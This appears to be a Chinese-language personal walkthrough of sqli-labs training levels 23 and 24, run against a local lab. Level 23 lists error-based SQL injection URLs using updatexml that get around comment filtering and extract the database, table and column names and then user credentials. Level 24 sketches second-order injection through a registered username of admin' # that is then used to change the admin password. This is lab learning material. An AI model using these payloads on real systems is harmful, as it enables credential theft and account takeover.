第二十三关
......(其实发现好简单的一关)
就是过滤 #和--
http://127.0.0.1/sqli/Less-23/?id=1' and '1'='1
http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1 #security
http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) and '1'='1 #users
http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1) and '1'='1 #username
http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1) and '1'='1 #password
http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(select concat_ws('~',username,password) from users limit 4,1),0x7e),1) and '1'='1 #'~stupid~stupidity~'
第二十四关
看到这关很懵逼的状态
能这么办注册账号.密码
用户名: admin' #
密码:123
然后点击忘记密码.
懵逼状态...真的蒙圈了.............
查看源码.....pass_change.php 修改密码
我是不是可以把请求页面修改一下,提交
我错了!!!我错了,我错了! 源码不一样坑爹.
就是修改了密码